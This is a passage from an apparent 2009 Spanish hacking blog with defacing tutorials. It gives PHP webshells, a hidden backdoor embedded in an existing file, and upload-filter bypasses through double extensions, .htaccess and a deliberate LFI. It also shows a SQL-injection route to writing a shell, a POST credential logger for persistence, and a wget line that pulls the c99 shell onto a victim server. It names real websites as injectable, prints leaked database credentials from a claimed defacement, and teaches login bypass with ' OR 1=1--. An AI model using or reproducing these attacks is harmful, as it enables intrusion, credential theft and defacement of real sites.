/>en otras palabras Gracias a que en la maquina remota esta corriendo un servicio, nuestra (Web)shell se ejecutara y podremos visualizarla por el navegador.<br /><br /><b><span style="color:red;"><br />0x03 Creacion de una PhpShell.</span><br /></b><br /><br />Pues como se imaginaran si quicieramos crear una phpshell, lo que necesitariamos fundamentalmente es conocer a fondo el lenguaje de programacion en el que la vamos a desarrollar, y crear opciones de manejo de archivos, navegacion en el servidor etc, es decir, todo lo que nos facilite interactuar con el sistema remoto.<br />un miniejemplo de una shell, que pueda ejecutar comandos en el servidor seria.<br /><br />partiendo de que el comando de php : system('dir'); ejecuta el comando dir en la maquina donde este alojado el archivo, entonces podremos decir que lo haremos para que ejecute todo lo que envien por un navegador.<br /><br />¿como asi? si pues por ejemplo si hacemos un archivo php con el siguiente contenido:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">echo </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'comando'</span><span style="color: rgb(0, 119, 0);">];<br /></span><span style="color: rgb(0, 0, 187);">?></span></span></span></pre></div><br /><br />lo guardamos como test.php. lo colocamos en un servidor web que soporte php (podrian hacerlo en uno free o localmente para probar) y accedemmos al archivo por el navegador asi<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">www.dondeestemontado.com/test.php?comando=Hola</pre></div><br />el resultado que nos debe arrojar el servidor es simpemente: Hola<br />pues lo que le decimos esq con GET osea hace referencia a lo q viaje por la url (por decirlo de algun modo) y solo decimos que escriba lo q llego en comando.<br /><br /><br />si modificamos el test.php por algo como esto<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">( </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'comando'</span><span style="color: rgb(0, 119, 0);">]);<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /></span></pre></div>lo que hara sera ejecutar el comando q le enviemos por la url<br />por ejemplo si mandamos algo como esto en la url<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">www.dondeestemontado.com/test.php?comando=dir</pre></div><br />se ejecutara un dir en el servidor.<br /><br />tambien podriamos hacer algo asi:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">( </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'comando'</span><span style="color: rgb(0, 119, 0);">]);<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /></span></pre></div><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">www.dondeestemontado.com/test.php?comando=index.php</pre></div><br />con lo que visualizaremos el codigo de index.php.<br /><br />como ven, con este archivo php estamos de ciertaforma comunicandos con la maquina. asi que digamos q este es el principio basico de una shell. Actualemente encontraras shells famosas como c99,c100,r57... entre muchas otras, que ya cuentan con sistemas completo para saltarse muchos filtros. son faciles de encontrar. simpemente si quieren algunas de las q les digo coloquen en google:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">inurl:c99.txt</pre></div><br /><span style="color:red;"><b>0x04 Subir una shell a un servidor</b></span><br /><br />Cuando se trata de atacar un servidor web, lo que uno principalmente busca de cierta forma, es tratar de colar una phpshell, para que? pues para tener mas acceso al servidor e ir por la informacion que nos interesa.<br />osea que ya se imaginaran que necesitan un especie de uploading o explotar algun tipo de bug que permita subir archivos. partiendo de ese principio basico se imaginaran que si colocamos digamos en google<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">inurl:upload.php</pre></div><br />encontraremos muchos uploading para probar haber si podemos colar una phpshell.<br />me he encontrado con muchas webs que no filtran las extensiones correctamente lo que nos permite subir archivos de forma arbitraria, eso es a lo llamamos <span style="color:red;">Arbitrary file Upload</span>, es asi como podemos subir una shell, sin tanto desmadre, y con poco esfuerzo.<br /><br />aprovecho para contarle algo q me sucedio, durante el deface a el-informador... note e un principio q tenia blind sql inyeccion. pues como algunos sabran ese tipo de inyeccion son algo tediosas... tardamos mucho en dar con el resultado que queremos y a veces teniendo en cuenta q probablemente no corramos con suerte. entonces ps estaba trantando de hacerla cuando me dio por probar encontrar el panel de admin de la web que esta ubicado en:<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">http://www.el-informador.com/admin/</pre></div>me tope con una sorpresa cuando vi que habia un uploader para imagenes, asi que probe subir una shell.<br />y pues medio resultado... me sorprendi un poco e inclusive me dio algo de risa, pues de blind sql inyeccion a tener un uploading listo... y sin ningun esfuerzo pues jum... nos ahorramos bastante.<br />de esta forma subi la shell del informador (que aun esta online).<br /><br />por otro lado, hay algunos tipos de filtros q nos podemos saltar, por ejemplo a veces usan cosas como<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">if(</span><span style="color: rgb(0, 0, 187);">strpos</span><span style="color: rgb(0, 119, 0);">(</span><span style="color: rgb(0, 0, 187);">$HTTP_POST_FILES</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'file'</span><span style="color: rgb(0, 119, 0);">][</span><span style="color: rgb(221, 0, 0);">'type'</span><span style="color: rgb(0, 119, 0);">],</span><span style="color: rgb(221, 0, 0);">"jpg"</span><span style="color: rgb(0, 119, 0);">))<br /></span><span style="color: rgb(0, 0, 187);">?></span></span></span></pre></div><br />aqui lo que hacen es mirar lo q viene en el campo type de la cabecera http, para obtener el tipo del archivo, si strpos encuentra el tipo devuelve la posicion, si no devuelve un falso... como todos sabran podemos modificar las cabeceras para cambiar el tipo, pueden usar el http live header, achilles, tamper data... por otro lado podemos encontrarnos con esta filtracion.<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">=</span><span style="color: rgb(0, 0, 187);">explode</span><span style="color: rgb(0, 119, 0);">(</span><span style="color: rgb(221, 0, 0);">"."</span><span style="color: rgb(0, 119, 0);">,</span><span style="color: rgb(0, 0, 187);">$nombreFIle</span><span style="color: rgb(0, 119, 0);">);<br />if(</span><span style="color: rgb(0, 0, 187);">$tipo</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(0, 0, 187);">1</span><span style="color: rgb(0, 119, 0);">]==</span><span style="color: rgb(221, 0, 0);">'jpg'</span><span style="color: rgb(0, 119, 0);">){<br />echo </span><span style="color: rgb(221, 0, 0);">"paso"</span><span style="color: rgb(0, 119, 0);">;<br />}<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /></span></pre></div>con lo que solo bastaria subir la shell con un nombre como este shell.jpg.php, porq? porq explode('.','shell.jpg.php')<br />parte el nombre en un vector y toma el . como referencia, por tanto la posicion 1 tiene jpg y la 2 tiene php. y al comparar solo con la 1 entonces al parecer seria un jpg.<br /><br /><br />haber comoquemonos en este contexto, no tenemos ningun uploading, solo tenemos un sql inyeccion, y no tenemos admin login ni nada. cuanto esto pasa, podemos intentar filtrar una shell con la setencia outfile<br />podria ser algo como :<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">union+select+,1,2,''+into+oufile+ruta/shell.php</pre></div><br /><br /><br />si nos pone mucha joda.. podemos intentar pasar el code php a hex para filtrarla.<br /><br />Tambien podemos subir un archivo con PUT, bajo la condicion que el phpini este con esto<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">allow_url_include = On<br />allow_url_fopen = On</pre></div>teniendo el put activado podemos enviar enla cabecera http algo como<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><br />PUT /archivo.php HTTP/1.1<br />Host: Ficticio.com<br />Content-Type: text/plain<br />Content-Length:4<br /><br /><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"></span></span></pre></div><br />y podremos subir shell.<br /><br /><br /><span style="color:red;"><b>0x05 Ya subi la shell y ahora?</b></span><br /><br />Una vez que logremos tener la shell arriba, uno de los tips o cosas que podemos hacer es buscar los archivos de configuracion de la BD, para que? pues para usmear, o para dumpearla, como asi dumpearla? pues veran es simplemente descargarnos una copia de su BD, en particular las shells tienen opciones para los archivos q lista... como ver descargar editar etc.<br /><br />ejemplo<br /><img src="http://i43.tinypic.com/33xd0fn.jpg" alt="" border="0" height="640" width="800" /><br /><br /><br />ahora usmeando un poco encontramos los archivos de configuracion, inclusive notamos que nuestra shell nos lo indica.<br /><br /><img src="http://i42.tinypic.com/2mfkwi1.jpg" alt="" border="0" height="538" width="800" /><br /><br />si lo clickeamos nos dara informacion como esta:<br /><br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;">$user_db = 'i1n1f3o4_admin'; // Server Username <br />$pass_db = 'infor2005'; // Server Password<br />$host_db = 'localhost'; // Server (e.g. localhost)<br />$db = 'i1n1f3o4_encuesta'; // Database to be created or name of existing database (Please note: Database containing dashes cannot be created)<br /></pre></div><br />con lo que nos podemos autenticar aqui.<br /><img src="http://i39.tinypic.com/vo7kb8.jpg" alt="" border="0" height="132" width="800" /><br /><br />Bueno una vez coloquemos los datos... de host,Bd user y password, podremos visualizar algo como:<br /><br /><img src="http://i41.tinypic.com/33oktcm.jpg" alt="" border="0" height="262" width="800" /><br /><br />la opcion dump es la que les habia mencionado previamente, y pues podran navegar en la bd... hagan de cuenta que es un cliente mysql.<br /><br />la shell tiene opciones para hacer back conection.<br />para que sirve? pues para bypasear el cortafuegos, podemos leer archivos ya sea usando php o mysql... podremos hacer un sinfin de cosas, yo aconsejo que le brujeen a la shell ojala la la monten localmente, y ensayan las opciones. que pues son bastante intuitivas.<br /><br /><span style="color:red;"><b>0x06 Preparando el sistema para volver</b></span><br />Bueno pues la idea es que una vez entramos, dejemos asegurado un proximo regreso, por ello esta es una de las tantas opciones, se trata de guardar en un log (que podria ser remoto pero que aqui lo dejo de forma local), esto se puede ubicar en el archivo php encargado de recibir los datos del login<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">foreach(</span><span style="color: rgb(0, 0, 187);">$_POST </span><span style="color: rgb(0, 119, 0);">as </span><span style="color: rgb(0, 0, 187);">$index </span><span style="color: rgb(0, 119, 0);">=> </span><span style="color: rgb(0, 0, 187);">$valor</span><span style="color: rgb(0, 119, 0);">){<br /></span><span style="color: rgb(0, 0, 187);">$log</span><span style="color: rgb(0, 119, 0);">=</span><span style="color: rgb(221, 0, 0);">"[in]"</span><span style="color: rgb(0, 119, 0);">.</span><span style="color: rgb(0, 0, 187);">$log</span><span style="color: rgb(0, 119, 0);">.</span><span style="color: rgb(0, 0, 187);">$index</span><span style="color: rgb(0, 119, 0);">.</span><span style="color: rgb(221, 0, 0);">" = > "</span><span style="color: rgb(0, 119, 0);">.</span><span style="color: rgb(0, 0, 187);">$valor</span><span style="color: rgb(0, 119, 0);">.</span><span style="color: rgb(221, 0, 0);">"[in]<br />"</span><span style="color: rgb(0, 119, 0);">;<br />}<br /><br /></span><span style="color: rgb(0, 0, 187);">$logFile</span><span style="color: rgb(0, 119, 0);">= </span><span style="color: rgb(0, 0, 187);">fopen</span><span style="color: rgb(0, 119, 0);">(</span><span style="color: rgb(221, 0, 0);">'logs.txt'</span><span style="color: rgb(0, 119, 0);">, </span><span style="color: rgb(221, 0, 0);">'a'</span><span style="color: rgb(0, 119, 0);">);<br /></span><span style="color: rgb(0, 0, 187);">fwrite</span><span style="color: rgb(0, 119, 0);">(</span><span style="color: rgb(0, 0, 187);">$logFile</span><span style="color: rgb(0, 119, 0);">, </span><span style="color: rgb(0, 0, 187);">$log</span><span style="color: rgb(0, 119, 0);">.</span><span style="color: rgb(221, 0, 0);">"\n"</span><span style="color: rgb(0, 119, 0);">);<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /></span></pre></div><br />Ahora podremos ver lo que guarde el log en logs.txt, aclaro q es un ejemplo simple, se podrian hacer cosas como conexion por ftp... etc. y si el admin quiere darse cuenta que le dejamos un keylogger (seria mas un POST logger o algo asi), pues tendria que ir a revisar el codigo fuente de su aplicacion.<br /><br /><span style="color:red;"><b>0x07 Dejar shell incrustada (Shell Embedded)</b></span><br /><br />se trata de agregar la shell dentro de un archivo existente, con el fin de evitar sumar archivos al servidor, solo es cuestion de encontrar el archivo indicado, y acomodamos la minishell para que solo reaccione si enviamos un parametro asi<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">if(</span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'activeshell'</span><span style="color: rgb(0, 119, 0);">]==</span><span style="color: rgb(221, 0, 0);">'activar'</span><span style="color: rgb(0, 119, 0);">){<br /></span><span style="color: rgb(0, 0, 187);">system</span><span style="color: rgb(0, 119, 0);">( </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'comando'</span><span style="color: rgb(0, 119, 0);">]);<br />}<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /><br /></span></pre></div><br />esto con el fin de evitar q salgan errores... q adviertan que hay problemas en el archivo<br /><br />y lo ejecutariamos asi<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">www.dondeestemontado.com/test.php?comando=dir&activeshell=activar</pre></div><br />Bueno aqui acaba este listado de tips... y de teoria... espere les guste.<br /><br /><span style="color:red;"><b><br />0x08 Preguntas de otros foros</b><br /></span><br /><br /><span style="color:orange;"><br /><b>ShadinessDark hackxcrack</b><br />Ah también me parece que le agregues la forma de esconder la shell...<br />Osea que no aparezca en la lista de archivos..</span><br /><b>R</b><br /><br />digamos q esta es su shell<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">if(</span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'activeshell'</span><span style="color: rgb(0, 119, 0);">]==</span><span style="color: rgb(221, 0, 0);">'activar'</span><span style="color: rgb(0, 119, 0);">){<br /></span><span style="color: rgb(0, 0, 187);">system</span><span style="color: rgb(0, 119, 0);">( </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'comando'</span><span style="color: rgb(0, 119, 0);">]);<br />}<br /></span><span style="color: rgb(0, 0, 187);">?></span></span></span></pre></div><br /><br />y este es el index.php<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">echo </span><span style="color: rgb(221, 0, 0);">"Lo que sea"</span><span style="color: rgb(0, 119, 0);">;<br /></span><span style="color: rgb(0, 0, 187);">?></span></span></span></pre></div><br /><br /><br />hay varias formas ... por un lado esta una que es simplemente:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">echo </span><span style="color: rgb(221, 0, 0);">"Lo que sea"</span><span style="color: rgb(0, 119, 0);">;<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /><br /><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">if(</span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'activeshell'</span><span style="color: rgb(0, 119, 0);">]==</span><span style="color: rgb(221, 0, 0);">'activar'</span><span style="color: rgb(0, 119, 0);">){<br /></span><span style="color: rgb(0, 0, 187);">system</span><span style="color: rgb(0, 119, 0);">( </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'comando'</span><span style="color: rgb(0, 119, 0);">]);<br />}<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /></span></span></pre></div><br />o<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">echo </span><span style="color: rgb(221, 0, 0);">"Lo que sea"</span><span style="color: rgb(0, 119, 0);">;<br /><br />if(</span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'activeshell'</span><span style="color: rgb(0, 119, 0);">]==</span><span style="color: rgb(221, 0, 0);">'activar'</span><span style="color: rgb(0, 119, 0);">){<br /></span><span style="color: rgb(0, 0, 187);">system</span><span style="color: rgb(0, 119, 0);">( </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'comando'</span><span style="color: rgb(0, 119, 0);">]);<br />}<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /></span></pre></div><br /><br /><br /><br />p´s es una forma sencilla. pero se podrian usar una especies de ofuscadres para que no se entienda el code.... y pues es cuestion de analizar cual es el mejor archivo para incrustar la shell... o el PostLogger...<br /><br /><br /><span style="color:orange;"><br /><b>edugibert hackxcrack</b><br />Se puede camuflar la shell con alguna archivo!! Haber si me explico coger el blinder y camuflar la shell con un pdf o un doc o lo que sea y después ejecutarlo ?¿ Si la respuesta es afirmativa como ?¿</span><br /><b>R:<br /></b><br /><br />si man eso se puede hacer... quizas hallan varias formas, pero por ahora se me ocurren 2.<br /><br />la primera es que subas digamos la shell con extension .jpg (o la que sea pero para el ejemplo sera jpg)<br /><br />con la shell arriba con otro formato agregas un .htaccess con el siguiente codigo<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><files><br />ForceType application/x-httpd-php<br /></files></pre></div><br /><br />eso hara que el servidor ejecute el code php de los jpg... por tanto aunq nuestra shell tenga extension jpg se ejecutara. ten encuenta q puede ser doc pdf lo q sea.<br /><br />psdta: buena pregunta, con esto complementare el tuto :D<br /><br /><br /><br />la otra que se me ocurre es que causemos un lfi aproposito asi:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><span style="color: rgb(0, 119, 0);">if(!empty(</span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'file'</span><span style="color: rgb(0, 119, 0);">])){<br />include </span><span style="color: rgb(0, 0, 187);">$_GET</span><span style="color: rgb(0, 119, 0);">[</span><span style="color: rgb(221, 0, 0);">'file'</span><span style="color: rgb(0, 119, 0);">];<br />}<br /></span><span style="color: rgb(0, 0, 187);">?></span></span><br /></span></pre></div><br /><br />y podremos incluir nuestra shell asi.<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">http://www.victim.com/filewithlfi.php?file=shell.jpg</pre></div><br /><br />lo que hara que se incluya la supuesta imagen y se ejecute el php.<br /><br /><br /><span style="color:orange;"><br /><br /><b>C3llu5 hackxcrack</b><br /><br />tengo una pregunta<br /><br />enkontre una web vulnerable, y logre subir un X texto para komprebar si me dejaba,<br /><br />haora e intentado subir una shell , pero haora mi problem es el peso de la shell, no me pone problema por el formato, pero no me sube por el peso del archivo de la shell,<br /><br />pues bueno mi pregunta, es ke si hay una de subirla, o alguna shell ke no pese tanto, para que no me ponga problema por el peso,</span><br /><b>R:</b><br /><br />man, que SO tiene el servidor?<br /><br />podria intentar subir un archivo php pero no con una shell, si no con un uploader... depues ya subes shell usando el archivo q subiste... (un uploader pesa mucho menos)<br /><br />o puede intentar subir un archivo php que ejecute esto<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">wget www.server.com/c99.txt;chmod 777 c99.txt;mv c99.txt shell.php</pre></div><br />donde <div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">www.server.com/c99.txt</pre></div>es la ubicacion de tu shell<br />y ya despues accedes a:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">www.victim.com/shell.php</pre></div><br /><br /><br /><br /><span style="color:red;"><b><br />0x10 Conclusiones</b><br /></span><br /><br />Nada solo resta decir, si quieres atacar algo la mejor herramienta es saber como funciona, asi tendras mas posibilidades<br /><br /><span style="color:red;"><b><br />0x10 Agrecimiento</b><br /></span><br /><br />Agradezco a Cygog por sacarme de un par de dudas :D.<br />y a todos los q preguntan porq asi se complementa el tutorial.<br /><br />Psdts<br />si ven errores o alguna bestialidad les agradezco me informen <img src="http://ethical-security.co.cc/Forum/Smileys/default/D.gif" alt=";D" border="0" /><br /><br />Continuara... sigo mejorandolo en el tiempo libre q me quede<br />by _84kur10_ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-63879823033925876422009-09-28T06:09:00.000-07:002009-09-28T06:10:49.503-07:00Patron de Bugs By _84kur10_<div align="center"><b><span style="color: red;"> Patron de Bugs<br /></span></b></div><br /><br /><span style="color: red;"><b>¿De que se trata?<br /></b></span><br /><br /><br />Saludos gente bueno para quienes se estan iniciando en el defacing, pues queria aportarles esta informacion, he encontrado un patron de bugs en algunos desarrollos a nivel web, como asi patron de bugs? si pues veran A veces cuando se encuentra un bug cualquiera, es bueno mirar la casa de desarrollo que implemento el sistema, porq? pues porq si cometio ese error una vez, es probable q tengan ese error en muchas de sus aplicaciones, es a lo q denomino patron de errores o de bugs, o bueno no se si tenga otro nombre, pero ps es mas o menos eso.<br /><br />Patrones.<br /><br /><br />Me he dado cuenta q casi todas las aplicaciones web de:<br /><br /><b><span style="color: red;">"Powered by Foramen"</span></b> Tienen sql inyeccion<br /><br />Ejemplo:<br /><br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;">http://www.analesdemedicina.com/cardiologia/noticia.php?noticia=-82071+union+select+1,@@version--</pre></div><br />no siempre es en el mismo componente pero si va por el mismo lado.<br /><br />Igual sucede con<br /><b><span style="color: red;">powered by Maiku</span></b><br /><br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;">http://www.otakunomichi.com/ver_articulos.php?articulo=-11+union+select+1,2,concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+170,1</pre></div><br /><br /><b><span style="color: red;">powered by Naranja Azul ®</span></b><br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">http://www.ministeriostorrefuerte.org/eventos.php?codigo=15'<br />http://gt.unmejorempleo.com/ofertas.php?id=1862'</pre></div><br /><span style="color: red;"><b><br />Powered by: Peruwebmedia.com<br /></b><br /></span><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">http://www.ciclismoperu.com/ver_titular.php?codigo=101&id=1'<br />http://www.disarva.com/vercategoria-quickbau.php?idmarca=12&id=55'<br /></pre></div><br />De esta ultima si q hay webs. me encontre bastantes.<br /><br /><br />Sql inyeccion en<br /><br />dork:inurl:php?id= "<b><span style="color: red;">Powered by Krátera</span></b>"<br /><br /><br />Bueno solo se trata de esto, = a medida q encuentre patrones, pues se podrian ir publicando aqui mismo. no se q tal les suene la idea, ya depues miramos si se reportan o que hacemos con eso.<br /><br /><br />Saludos.ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-66560517414244938722009-09-28T06:06:00.000-07:002009-09-28T06:09:27.467-07:00Bypasseando Logins y Accediendo a la Administración By: KuTeR<span style="color: red;">Introducción:</span><br /><br />Bueno este es mi primer tutorial para la zona de Labs de BugDox, se lo dedico sobre todo a ShadinessDark y Zero Bits por enseñarme todo lo que se de esto <img src="http://ethical-security.co.cc/Forum/Smileys/default/wink.gif" alt=";)" border="0" /> (Gracias brothers). Tambieén un saludo para: Rodro,zonithack,lost-mind,3mp3z@nd0,dark113r,Hackreatorz,mandito,kamus,kozmic.kizz,Pride,84kur10,z1z30f y jeferx.<br /><br /><span style="color: red;">¿Login? ¿Qué es eso?</span><br /><br />Para los que anden despistadillos voy a explicar un login..<br /><br /><i><span style="font-size: 6pt; line-height: 1.3em;">Uff menos mal, pensaba que me ibas a mandar a wikipedia</span></i><br /><br /><b>Un login es el conjunto formado por usuario y contraseña que se usa normalmente en la informática para validar la entrada de usuarios autorizados a sistemas.</b><br /><br /><span style="color: red;">¿Qué es eso de bypassear un login?</span><br /><br />Cuando hablamos de 'Bypassear', nos referimos a redirigir el tráfico por otro lado, es decir, imagínate a el típico policía con su chaleco y sus palitos de luz (xD) en la calle ordenando el tráfico, imaginate que ese policía en realidad no es policía, sino un tipo vestido de ello que lo que intenta es <del>montar la de dios</del> liarla. Pues esto funciona más o menos así, mediante sentencias SQL los intrusos intentan saltarla la restricción del login y tener acceso a un sitio para el que no está autorizado, todo esto 'Bypasseando<br /><br /><span style="color: red;">Empezamos con lo bueno</span><br /><br /><span style="font-size: 6pt; line-height: 1.3em;"><i>Uff,menos mal, ya me estaba aburriendo <img src="http://ethical-security.co.cc/Forum/Smileys/default/dry.gif" alt="¬¬" border="0" /></i></span><br /><br />Si no te gusta que te expliquen las cosas, no vales para esto, sinceramente.<br /><br />Bien vamos a empezar, lo primero antes de nada es recurrir a nuestro compañero de juegos, supongo que ya me entendereis, el TODOPODEROSO Google. Introducimos alguno de estos dorks:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">allinurl: /admin.asp<br />allinurl: /admin.php<br />allinurl: /admin/<br />allinurl: /login.php<br />allinurl: /login.asp</pre></div><br />Ya tenemos suficientes, aunque hay más.<br /><br />Bien ahora nos toca buscar algún login, la mayoría de los logins bypasseables tienen un aspecto basto e incluso viejo aunque eso es un mito y no hay que hacer demasiado caso.<br /><br /><span style="color: red;">Un poquito más de teoría</span><br /><br />Dirás, ya estoy delante de un login, ¿y ahora qué?, bien antes de pasar a la práctica te voy a explicar como funciona un login.<br /><br />Si sabes HTML supongo que comprenderás que la estructura de un login es más o menos una cosa así:<br /><br /><form action="/results.php" method="POST"><br />Login:<br /><input type="text" name= "login" value=""><br />Password:<br /><input type="password" name="pass" value=""><br /><input type="submit" name="enviar" value="Enviar"><br /></form><br /><br />Una cosa así, y una vez que los datos hayan sido introducidos y hayamos pulsado el boton de enviar, los datos serán validados en la página results.php y se producirá una consulta a la base de datos SQL, una cosa así<br /><br />SELECT FROM usuarios Where Username="usuariointroducido" AND Password="passwordintroducida"<br /><br />más o menos así, si se cumple te dará acceso, sino NO, ¿ero que pasa si sustituimos la password y el usuario por<br />' OR 1=1-- ?<br /><br />La consulta quedaría así:<br /><br />SELECT FROM usuarios Where Username=' OR 1=1-- AND Password=' OR 1=1<br /><br />¿ A que la condición establecida se cumple? 1 es igual a 1 ¿No? Pues como imaginais nos dará acceso <img src="http://ethical-security.co.cc/Forum/Smileys/default/D.gif" alt=";D" border="0" /><br /><br />LO HEMOS CONSEGUIDO<br /><br />También podemos probar con otras sentencias como ' OR '='-- o ' OR 'x'='x' etc...<br /><br /><br />(obviamente esto no funciona en todas las webs)<br /><br /><span style="color: red;">Conclusión</span><br /><br />La conclusión que sacamos, como en casi todas las vulnerabilidades causadas por una mala programación de la página web, es que siendo tanto administradores como webmasters de una página web el mínimo fallo nos puede llevar a la ruína, un fallo tan evidente puede atraer tanto a defacers eticos como a lammers que te borren todo de la web y te pongan un cartelito: SOY DIOS Y TE HE JUANKEADO.<br /><br /><span style="color: red;">Despedida</span><br /><br />Esto ha sido todo, espero haberos ayudado y no seais muy duros con las críticas <img src="http://ethical-security.co.cc/Forum/Smileys/default/wink.gif" alt=";)" border="0" /> xd<br /><br />Saludos!ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-89352211112398012832009-09-18T07:56:00.000-07:002009-09-18T10:22:16.271-07:00White Shadow Primera ediccion<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img269.imageshack.us/img269/674/whiteshadow.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 500px; height: 700px;" src="http://img269.imageshack.us/img269/674/whiteshadow.png" alt="" border="0" /></a><br /><div style="text-align: center;"><b>Bueno primero que nada saludo a la gente de BugDox. Aca les 